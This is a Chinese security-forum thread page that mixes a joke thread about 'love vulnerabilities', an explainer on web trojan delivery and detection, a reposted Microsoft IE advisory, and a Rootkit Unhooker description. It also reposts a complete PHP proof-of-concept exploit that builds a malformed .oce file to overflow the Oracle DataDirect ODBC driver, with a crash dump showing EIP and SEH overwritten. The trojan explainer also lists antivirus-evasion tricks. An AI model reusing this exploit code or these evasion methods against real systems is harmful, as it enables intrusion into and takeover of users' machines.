最近看过此主题的会员

返回列表 发帖

众黑客浅谈爱情漏洞

Web脚本存在漏洞可以修补,如果俩个人爱情存在漏洞,让小三入侵成功了你会怎么办?

顺子 曰:你给的不够或者太多,女人会宠坏。

x1mx09 曰:只要前期做好“取长补短”就有预防,然后上报安全中心(对方父母)。


脚本安全网站长 曰:有洞就去补啊  不给人家机会怎么可能会提权。


瑣碎流年 曰:   哥 把小三注射死。


0Day网络站长  曰:找小四去。

黑小子 曰:去打小三一顿,然后甩掉那女的,自己做自己单身贵族。


普瑞斯特 曰:如果还只是恋爱关系,而且感情不佳,趁早分了吧,如果尚存感情,可以找个机会好好跟
她谈一谈,了解下她什么想法。

兔子 曰:只能说明你的魅力不够。

13YD 曰:感情这我麻木。

东飘情血/影 曰: 把她的洞子都补上,然后在做层防护。 不让小三有机会入侵。 万一入侵成功了。你把她的权限设死点,不让小三有机会提权。如果小三还成功了,就只能怪你自己没努力,还不行。  

太子King[FAM] 曰:别补了 重做系统。

流氓青年 曰:在没发现漏洞前做好防护措施/

情书 曰:如果你努力修补了第一处漏洞,而另外一处漏洞相继浮现出来。那只能证明这是一段不值得你珍惜的爱情。

 

您可能还想看的主题:

linux安全网高级黑客视频教程【1.2GB】

中国白客安全网网页制作课程更新中

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:h1ck5r发表,本帖发表者h1ck5r符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者h1ck5r和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

虽然我看不懂 但是也 顶 顶 顶 ···

TOP

网页如何挂马/安全辅助工具工作原理分析
IE7 0day 传说中卖12W  IE XML解析远程缓冲溢出漏洞
作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭到攻击和控制。为达到目的首先要将木马下载到本地。根据上图的流程,常见的方式有以下几种: 1.将木马伪装为页面元素。木马则会被浏览器自动下载到本地。 2.利用脚本运行的漏洞下载木马 3.利用脚本运行的漏洞释放隐含在网页脚本中的木马 4.将木马伪装为缺失的组件,或和缺失的组件捆绑在一起(例如:flash播放插件)。这样既达到了下载的目的,下载的组件又会被浏览器自动执行。 5.通过脚本运行调用某些com组件,利用其漏洞下载木马。 6.在渲染页面内容的过程中利用格式溢出释放木马(例如:ani格式溢出漏洞) 7.在渲染页面内容的过程中利用格式溢出下载木马(例如:flash9.0.115的播放漏洞) 在完成下载之后,执行木马的方式有以下几种: 1.利用页面元素渲染过程中的格式溢出执行shellcode进一步执行下载的木马 2.利用脚本运行的漏洞执行木马 3.伪装成缺失组件的安装包被浏览器自动执行 4.通过脚本调用com组件利用其漏洞执行木马。 5.利用页面元素渲染过程中的格式溢出直接执行木马。 6.利用com组件与外部其他程序通讯,通过其他程序启动木马(例如:realplayer10.5存在的播放列表溢出漏洞) 在与网马斗争的过程中,为了躲避杀毒软件的检测,一些网马还具有了以下行为: 1.修改系统时间,使杀毒软件失效 2.摘除杀毒软件的HOOK挂钩,使杀毒软件检测失效 3.修改杀毒软件病毒库,使之检测不到恶意代码。 4.通过溢出漏洞不直接执行恶意代码,而是执行一段调用脚本,以躲避杀毒软件对父进程的检测。 网页挂马的检测 传统的检测防御方式: 1.特征匹配。将网页挂马的脚本按脚本病毒处理进行检测。但是网页脚本变形方、加密方式比起传统的PE格式病毒更为多样,检测起来也更加困难。 2.主动防御。当浏览器要做出某些动作时,做出提示,例如:下载了某插件的安装包,会提示是否运行,比如浏览器创建一个暴风影音播放器时,提示是否允许运行。在多数情况下用户都会点击是,网页木马会因此得到执行。 3.检查父进程是否为浏览器。这种方法可以很容易的被躲过且会对很多插件造成误报。 安天防线的行为分析方式: 1.检测伪装文件格式。通过对文件格式精确的识别,判断页面元素是否为伪装的恶意代码。 2.检查页面元素来源是否为长期散布网页挂马的站点。 3.检测特定函数调用堆栈实现。 (a)区分用户下载文件,浏览器自动下载文件。 (b)检测已知缓冲区漏洞。 (c)检测进程创建调用堆栈、调用参数是否和浏览器常规一致,以检测未知漏洞造成的文件执行。 4.对文件执行进行监控,检测文件执行参数等特征。 5.对部分目录写文件操作进行监控。 6.检测系统时钟修改。 7.检测对系统DLL内存镜像修改(导入、导出表、函数体内容)。 8.检查PE文件和CAB包裹的数字签名。 9.特定文件格式检测,检测已知的格式溢出。 通过对以上几项的加权处理,可以实现有效对已知和未知网页挂马的检测


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

幽月网站全球排名批量查询器
一款不错的查询工具 授权转载于幽月BLOG  http://a1l.cn/article.asp?id=10
版权属幽月所有,转载请著名
[/quote]
[quote]下载地址


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MS07-069:Internet Explorer累积性安全进行更新
发布日期: 十二月 11, 2007Version: 1.0
摘要 此严重安全更新可消除四个秘密报告的漏洞。 最严重的安全影响可能在用户使用 Internet Explorer 查看特制网页时允许远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
建议。 Microsoft 建议用户立即应用此更新。
受影响的软件
操作系统 组件 最大安全影响 综合严重程度等级 此更新替代的公告  Internet Explorer 5.01 和 Internet Explorer 6 Service Pack 1         Microsoft Windows 2000 Service Pack 4 Microsoft Internet Explorer 5.01 Service Pack 4 远程执行代码 严重 MS07-057 Microsoft Windows 2000 Service Pack 4 Microsoft Internet Explorer 6 Service Pack 1 远程执行代码 严重 MS07-057 Internet Explorer 6         Windows XP Service Pack 2 Microsoft Internet Explorer 6 远程执行代码 严重 MS07-057 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 Microsoft Internet Explorer 6 远程执行代码 严重 MS07-057 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 Microsoft Internet Explorer 6 远程执行代码 中等 MS07-057 Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2 Microsoft Internet Explorer 6 远程执行代码 中等 MS07-057 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) Microsoft Internet Explorer 6 远程执行代码 中等 MS07-057 Internet Explorer 7         Windows XP Service Pack 2 Windows Internet Explorer 7 远程执行代码 严重 MS07-057 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 Windows Internet Explorer 7 远程执行代码 严重 MS07-057 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 Windows Internet Explorer 7 远程执行代码 中等 MS07-057 Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2 Windows Internet Explorer 7 远程执行代码 中等 MS07-057 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) Windows Internet Explorer 7 远程执行代码 中等 MS07-057 Windows Vista Windows Internet Explorer 7 远程执行代码 严重 MS07-057 Windows Vista x64 Edition Windows Internet Explorer 7 远程执行代码 严重 MS07-057
微软的安全公告:
http://www.microsoft.com/china/technet/security/bulletin/MS07-069.mspx
(以上链接均连到第三方网站)


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

甲骨文DataDirect ODBC驱动程序arsqls24.dll缓冲溢出漏洞
<?php
/*
甲骨文DataDirect ODBC驱动程序arsqls24.dll缓冲溢出漏洞
Overflow PoC (*.oce)
by rgod

This poc will create a suntzu.oce file
which should work against Hyperion Interactive Reporting Studio
which is delivered with Oracle Hyperion Suite.
When clicked a login box appears, on clicking OK an error message
also appears then error then... boom!

description for .oce :
Interactive Reporting database connection file

file association:
"C:OracleMiddleware3EPMSystem11R1productsiplus\bin\brioqry.exe" "%1"

crash dump, eip and seh overwritten, unicode expanded,
I suppose one should be able to deal with it :

(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=0e752eb8 edx=0f490000 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
brioqry+0x10043:
00410043 0152ff          add     dword ptr [edx-1],edx ds:0023:0f48ffff=????????
0:000> g
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=00410041 edx=7c8285f6 esi=00000000 edi=00000000
eip=00410043 esp=00129f10 ebp=00129f30 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
brioqry+0x10043:
00410043 0152ff          add     dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00
*/

function _x($x){
  global $buff;
  list($x) = array_values(unpack('V', $x));
  $x = $x + strlen($buff);
  $x = pack('V',$x);
  return $x;
}

$buff = "mydatabase.com".
        str_repeat("x20",16).  //cosmetics, no AAAA... inside the login box
        str_repeat("x41",4000);
//$dsn="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;";     
//$dsn="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null";
$dsn="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=XXXXXXXXX;";
while (!(strlen($dsn)==166)){ //fill the gap
  $dsn.="x20";
}
$dsn=str_replace("HOST=;","HOST=".$buff.";",$dsn);
$dump=
"#BRIFx20BIN001".
"x00x00x00x00".
_x("x7bx07x00x00"). //header length, increase counter
"x37x00x00x00". //path length
"D:\Documentsx20andx20Settings\Admin\Desktop\Predefinito.oce".
"x01x00x01x00".
"x00x00x07x00".
"x00x00x0ax00".
"x00x00".
_x("xa6x00x00x00"). //dsn length
$dsn.
"x00x00x00x00".
"x00x00x00x00".
"x04x00x00x00".
"True".
"x00x00x00x00x01x00x00x00x00x00x00x00x00x00".
"x00x00x00x01x00x01x00x00x01x00x00x00x00x00x00x00".
"x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x01x00x00x00@x00x00".
"x00x00x00x00x00x00x00x00@x00x00x00x04x00x00x00x00".
"x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00x00".
"x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00x04".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x04x00x00x00
x00x00x00".
"ColItem.Table".
"x01x00".
"x00x00x04x00x00x00x12x00x00x00".
"ColItem.TableAlias".
"x01x00x00x00x10x00".
"x00x00
x00x00x00".
"ColItem.Owner".
"x01x00x00x00x1cx00x00x00x0cx00x00".
"x00".
"ColItem.Type".
"x01x00x00x00(x00x00x00x03x00x00x00x06x00x00x00".
"Source".
"x01x00x00x00x05x00x00x004x00x00x00x05x00x00x00".
"Where".
"x01".
"x00x00x00x05x00x00x008x00x00x00x07x00x00x00".
"OrderBy".
"x01x00".
"x00x00x05x00x00x00<x00x00x00|x00x00x00x04x00x00x00".
"x00x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00".
"x00x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00".
"x04x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00".
"x00x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00".
"x00x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00".
"x04x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x09x00x00x00x0cx00x00x00ColItem.Namex01x00x00x00".
"x04x00x00x00x10x00x00x00".
"ColItem.ColAlias".
"x01x00x00x00x10x00x00x00".
"x0ex00x00x00".
"ColItem.ColNum".
"x01x00x00x00x1cx00x00x00x0fx00x00x00".
"ColItem.ColType".
"x01x00x00x00(x00x00x00x10x00x00x00".
"ColItem.NumBytes".
"x01x00x00x004x00".
"x00x00x0ex00x00x00".
"ColItem.Places".
"x01x00x00x00@x00x00x00x0ex00x00".
"x00".
"ColItem.Digits".
"x01x00x00x00Lx00x00x00
x00x00x00".
"ColItem.Nulls".
"x01x00x00x00Xx00".
"x00x00x12x00x00x00".
"ColItem.NativeType".
"x01x00x00x00dx00x00x00x03x00x00".
"x00x06x00x00x00".
"Source".
"x01x00x00x00x05x00x00x00px00x00x00".
"x05x00x00x00".
"Where".
"x01x00x00x00x05x00x00x00tx00x00x00x07".
"x00x00x00".
"OrderBy".
"x01x00x00x00x05x00x00x00xx00x00x000x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x0bx00x00x00x06x00x00x00".
"PTable".
"x01x00x00x00x05x00x00".
"x00x04x00x00x00x06x00x00x00".
"POwner".
"x01x00x00x00x05x00x00".
"x00x08x00x00x00x07x00x00x00".
"PDBName".
"x01x00x00x00x05x00x00".
"x00x0cx00x00x00x08x00x00x00".
"PColName".
"x01x00x00x00x05x00x00".
"x00x10x00x00x00x06x00x00x00".
"FTable".
"x01x00x00x00x05x00x00".
"x00x14x00x00x00x06x00x00x00".
"FOwner".
"x01x00x00x00x05x00x00".
"x00x18x00x00x00x07x00x00x00".
"FDBName".
"x01x00x00x00x05x00x00".
"x00x1cx00x00x00x08x00x00x00".
"FColName".
"x01x00x00x00x05x00x00".
"x00x20x00x00x00x06x00x00x00".
"SeqKey".
"x01x00x00x00x05x00x00".
"x00$x00x00x00x06x00x00x00".
"Source".
"x01x00x00x00x05x00x00x00".
"(x00x00x00x05x00x00x00".
"Where".
"x01x00x00x00x05x00x00x00,x00".
"x00x00)x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00
".
"x00x00".
"x00x09x00x00x00".
"SrcDBName".
"x01x00x00x00x05x00x00x00x04x00x00".
"x00x08x00x00x00".
"SrcOwner".
"x01x00x00x00x05x00x00x00x08x00x00".
"x00x08x00x00x00".
"SrcTable".
"x01x00x00x00x05x00x00x00x0cx00x00".
"x00x08x00x00x00".
"LookupID".
"x01x00x00x00x05x00x00x00x10x00x00".
"x00x0bx00x00x00".
"ColumnValue".
"x01x00x00x00x05x00x00x00x14x00x00".
"x00x11x00x00x00".
"ColumnDescription".
"x01x00x00x00x05x00x00x00x18x00x00".
"x00x0cx00x00x00".
"LimitMapFrom".
"x01x00x00x00x05x00x00x00x1cx00x00".
"x00
x00x00x00".
"LimitMapWhere".
"x01x00x00x00x05x00x00x00x20x00x00x00".
"x0bx00x00x00".
"LookupWhere".
"x01x00x00x00x05x00x00x00$x00x00x00x0e".
"x00x00x00".
"IsCustomLookup".
"x01x00x00x00x01x00x00x00(x00x00x00x04x00".
"x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00".
"x01x08x00x00x00x00x00x00x00x00x00x00x00x01x00x00".
"x00x0cx00x00x00".
"NumTableTabs".
"x01x00x00x00x03x00x00x00x04x00x00".
"x00x08x00x00x00x00x00x00x00x00x00x00x00x01x00x00".
"x00
x00x00x00".
"NumColumnTabs".
"x01x00x00x00x03x00x00x00x04x00x00x00".
"x8ax00x00x00x17x00x00x00yyyy-mm-ddx20HH:MM:SS.fffx17x00x00x00yyyy-mm-ddx20HH:MM:SS.fffx17x00".
"x00x00yyyy-mm-ddx20HH:MM:SS.fff
".
"x00x00x00yyyy-mm-ddx08x00x00x00HH:MM:SSx17x00x00x00yyyy-mm-ddx20HH:MM:SS.fffx00".
"x00x00x00x01x00x00x00x08x00x00x00DateAttrx06x00x00x00x05".
"x00x00x00x04x00x00x00x08x00x00x00x12x00x00x00".
"TableCat.DaOCEPref".
"x01x00x00x00".
_x("Nx01x00x00").            
"x10x00x00x00".
"ColCat.DaOCEPref".
"x01x00x00x00".
_x("@x02x00x00").            
"x11x00x00x00".
"FKeyCat.DaOCEPref".
"x01x00x00x00".
_x("xf6x03x00x00").         
"x15x00x00x00".
"LimitMapSQL.DaOCEPref".
"x01x00x00x00".
_x("%x05x00x00").            
"x15x00x00x00".
"TableFilter.DaOCEPref".
"x01x00x00x00".
_x("ex06x00x00").            
"x15x00x00x00".
"TableRemarks.DMParams".
"x01x00x00x00".
_x("xx06x00x00").            
"x16x00x00x00".
"ColumnRemarks.DMParams".
"x01x00x00x00".
_x("xa4x06x00x00").         
"x14x00x00x00".
"DateFormats.DMParams".
"x01x00x00x00".
_x("xd1x06x00x00").         
":x00x00x00".
"x0ex00x00x00".
"OpenCatalogExt".
"x01x00x00x00".
"x05x00x00x00".
"x04x00x00x00".
"x06x00x00x00".
"IsUTF8".
"x01x00x00x00".
"x01x00x00x00".
"?x00x00x00".
"x07x00x00x00".
"SavePwd".
"x01x00x00x00".
"x01x00x00x00".
"@x00x00x00".
"x08x00x00x00".
"ConnType".
"x01x00x00x00".
"x03x00x00x00".
"Ax00x00x00".
"x07x00x00x00".
"ApiCode".
"x01x00x00x00".
"x03x00x00x00".
"Ex00x00x00".
"x07x00x00x00".
"SvrCode".
"x01x00x00x00".
"x03x00x00x00".
"Ix00x00x00".
"x08x00x00x00".
"Extra1_1".
"x01x00x00x00".
"x05x00x00x00".
"Mx00x00x00".
"x06x00x00x00".
"CurrDB".
"x01x00x00x00".
"x05x00x00x00".
_x("xf7x00x00x00").         
"x06x00x00x00".
"DBList".
"x01x00x00x00".
"x05x00x00x00".
_x("xfbx00x00x00").         
"
x00x00x00".
"MetaData_Save".
"x01x00x00x00".
"x05x00x00x00".
_x("xffx00x00x00").         
"x0bx00x00x00".
"MetaDataKey".
"x01x00x00x00".
"x03x00x00x00".
_x("x07x01x00x00").         
"x12x00x00x00".
"InformaticaWritten".
"x01x00x00x00".
"x01x00x00x00".
_x("x0bx01x00x00").         
"x0cx00x00x00".
"SelectCommit".
"x01x00x00x00".
"x03x00x00x00".
_x("x0cx01x00x00").         
"x0bx00x00x00".
"DBCancelOpt".
"x01x00x00x00".
"x03x00x00x00".
_x("x10x01x00x00").         
"
x00x00x00".
"StringMode".
"x01x00x00x00".
"x01x00x00x00".
_x("x14x01x00x00").         
"x0bx00x00x00".
"EdaHardQuit".
"x01x00x00x00".
"x01x00x00x00".
_x("x15x01x00x00").         
"x08x00x00x00".
"DisTrans".
"x01x00x00x00".
"x01x00x00x00".
_x("x16x01x00x00").         
"x08x00x00x00".
"UpdValid".
"x01x00x00x00".
"x01x00x00x00".
_x("x17x01x00x00").         
"
x00x00x00".
"UseODBCDlg".
"x01x00x00x00".
"x01x00x00x00".
_x("x18x01x00x00").         
"x09x00x00x00".
"JoinInfoQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x19x01x00x00").         
"
x00x00x00".
"GuessJoinQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1ax01x00x00").         
"x0bx00x00x00".
"CustomJoinQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1bx01x00x00").         
"x0bx00x00x00".
"CustTblQryQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1cx01x00x00").         
"x09x00x00x00".
"FastModeQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1dx01x00x00").         
"
x00x00x00".
"CurrOCETab".
"x01x00x00x00".
"x03x00x00x00".
_x("x1ex01x00x00").         
"x07x00x00x00".
"CurrTab".
"x01x00x00x00".
"x03x00x00x00".
_x(""x01x00x00").            
"
x00x00x00".
"CurrRepManTab".
"x01x00x00x00".
"x03x00x00x00".
_x("&amp;x01x00x00").               
"x0ex00x00x00".
"UseODBCDBNameQ".
"x01x00x00x00".
"x01x00x00x00".
_x("*x01x00x00").            
"
x00x00x00".
"UseTblSqlQ".
"x01x00x00x00".
"x01x00x00x00".
_x("+x01x00x00").            
"x07x00x00x00".
"QuotedQ".
"x01x00x00x00".
"x01x00x00x00".
_x(",x01x00x00").            
"x09x00x00x00".
"ChangeDBQ".
"x01x00x00x00".
"x01x00x00x00".
_x("-x01x00x00").            
"
x00x00x00".
"SaveUserNameQ".
"x01x00x00x00".
"x01x00x00x00".
_x(".x01x00x00").            
"x0cx00x00x00".
"UseTimeLimit".
"x01x00x00x00".
"x01x00x00x00".
_x("/x01x00x00").            
"x09x00x00x00".
"TimeLimit".
"x01x00x00x00".
"x03x00x00x00".
_x("0x01x00x00").            
"x0cx00x00x00".
"AllowNonJoin".
"x01x00x00x00".
"x01x00x00x00".
_x("4x01x00x00").            
"x07x00x00x00".
"MDDMode".
"x01x00x00x00".
"x01x00x00x00".
_x("5x01x00x00").            
"
x00x00x00".
"PacketSize".
"x01x00x00x00".
"x03x00x00x00".
_x("6x01x00x00").            
"x0cx00x00x00".
"DisableAsync".
"x01x00x00x00".
"x01x00x00x00".
_x(":x01x00x00").            
"x06x00x00x00".
"IsHPIW".
"x01x00x00x00".
"x01x00x00x00".
_x(";x01x00x00").            
"x10x00x00x00".
"RetainDateFormat".
"x01x00x00x00".
"x01x00x00x00".
_x("<x01x00x00").            
"x10x00x00x00".
"AdvSetOperations".
"x01x00x00x00".
"x01x00x00x00".
_x("=x01x00x00").              
"x10x00x00x00".
"MemberProperties".
"x01x00x00x00".
"x01x00x00x00".
_x(">x01x00x00").            
"x1cx00x00x00".
"UseOracleOuterJoinOpOnLimits".
"x01x00x00x00".
"x01x00x00x00".
_x("?x01x00x00").            
"x18x00x00x00".
"UseODBCOuterJoinOnLimits".
"x01x00x00x00".
"x01x00x00x00".
_x("@x01x00x00").            
"x16x00x00x00".
"UseODBCOuterJoinSyntax".
"x01x00x00x00".
"x01x00x00x00".         
_x("Ax01x00x00").            
"x10x00x00x00".
"OracleBufferSize".
"x01x00x00x00".
"x03x00x00x00".
_x("Bx01x00x00").                     
"x08x00x00x00".
"CustTblQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Fx01x00x00").            
"x08x00x00x00".
"CustColQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Gx01x00x00").            
"x0cx00x00x00".
"FilterOwnerQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Hx01x00x00").            
"x0cx00x00x00".
"FilterTableQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Ix01x00x00").            
"x0bx00x00x00".
"FilterTypeQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Jx01x00x00").            
"x0cx00x00x00".
"DefineTableQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Kx01x00x00").            
"x0cx00x00x00".
"DefineOwnerQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Lx01x00x00").            
"x0bx00x00x00".
"DefineTypeQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Mx01x00x00").            
"x15x00x00x00".
"FilterBRIOTblsSetting".
"x01x00x00x00".
"x01x00x00x00".
_x("qx06x00x00").            
"x19x00x00x00".
"UseDifferentRepConnection".
"x01x00x00x00".
"x01x00x00x00".
_x("rx06x00x00").            
"x11x00x00x00".
"MetaDataOwnerName".
"x01x00x00x00".
"x05x00x00x00".
_x("sx06x00x00").            
"x09x00x00x00".
"AdvOption".
"x01x00x00x00".
"x01x00x00x00".
_x("wx06x00x00").            
"x00";
file_put_contents("suntzu.oce",$dump);
?>




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Rootkit Unhooker 来自俄罗斯的Rootkit检测工具
Rootkit Unhooker 来自俄罗斯的Rootkit检测工具
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)Rootkit Unhooker是一款较新的RK检测工具,来自俄罗斯.其检测手段比IceSword可靠得多(虽然功能还不如IceSword齐全).有服务描述表钩子检测和恢复,强大的进程检测,强大的驱动检测,隐藏进程杀除,API钩子检测,驱动转储,生成报告等等功能.1.软件界面为英文(低版本有中文文件,但不可用于高版本)2. 支持以下操作系统 Windows 2000 Professional SP4, Rollup 1 Windows XP Home/Professional SP1, SP2 Windows 2003 Server (all editions) SP1, SP2 Windows Vista Ultimate3.为避免出错,使用工具前关掉其他AntiRootkit工具以及带主动防御的反病毒产品(如卡巴斯基)、HIPS软件4.软件运行需要管理员权限5.要在安全模式下使用这个工具,在主界面选择Setup->"Extended Mode"Rootkit Unhooker LE (RkU) is an advanced rootkit detection/removal utility, designed specially for advanced users and IT professionals. It runs under 32bit Windows 2000, Windows XP, Windows 2003 Server and Windows Vista. If you don't know how to use it, please do not tell that it is not working or found nothing. In the 95% of such incidents users simple don't know how to use this program.Rootkit Unhooker features:RkU News  Other Downloads  Sources  zo_O z0ne  About us  SSDT Hooks Detection and Restoring Shadow SSDT Hooks Detection and Restoring Hidden Processes Detection/Terminating/Dumping Hidden Drivers Detection and Dumping Hidden Files Detection/Copying/Deleting Code hooks Detection and Restoring Report generationSupported operation systems:x86 32 bit Windows 2000 SP4x86 32 bit Windows XP +SP1, SP2x86 32 bit Windows 2003 +SP1, SP2x86 32 bit Windows VistaNote: RkU requires Administrator rights to launch and work. 04 October 2007 - Rootkit Unhooker updated to 3.7.300.509 Changes: fixed (we hope) detection for several types of hooks fixed raw ntfs glitch at start important: this version by default disables extended method of hidden processes detection, to enable it start rku from console with the following parameter "-hookswap" without quotes (e.g. Rku.exe -hookswap) 官网:http://rku.nm.ru/


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表